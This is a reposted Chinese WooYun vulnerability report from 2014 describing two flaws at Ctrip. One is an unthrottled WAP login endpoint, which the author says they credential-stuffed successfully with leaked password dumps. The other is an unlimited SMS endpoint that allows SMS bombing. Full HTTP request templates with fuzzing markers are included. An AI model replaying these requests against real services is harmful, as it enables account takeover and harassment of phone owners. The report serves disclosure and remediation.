记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

携程某接口接口缺陷可撞库(已测试部分数据)及短信轰炸

2014-12-26 14:00

BUG1、

问题接口:https://accounts.ctrip.com/globalwap/account/login/

基本上其他国家的WAP页面登陆口都在这里进行验证的,但是没做任何的限制



登录时抓取数据包:

code 区域
POST /globalwap/account/login/ HTTP/1.1

Host: accounts.ctrip.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: https://accounts.ctrip.com/globalwap/account/login/

Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 39



UserName=§15555555555§&Password=§111111111§





这里使用互联网的流出的裤子进行撞库,仅使用了一小部分数据进行测试,成功率非常大。





BUG2、

短信接口未限制,可导致短信轰炸:

code 区域
GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1

Host: b.ctrip.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888

Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1

Connection: keep-alive



此短信接口无任何限制.....

漏洞证明:

111020243a3ede5aea31906d4c5b8f345b41aedd.jpg



11102038ef4d72636a23d996853e75c5318a99ad.jpg

修复方案:

在登陆接口加个验证吧


知识来源: www.wooyun.org/bugs/wooyun-2014-082848

阅读:213845 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“携程某接口接口缺陷可撞库(已测试部分数据)及短信轰炸”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云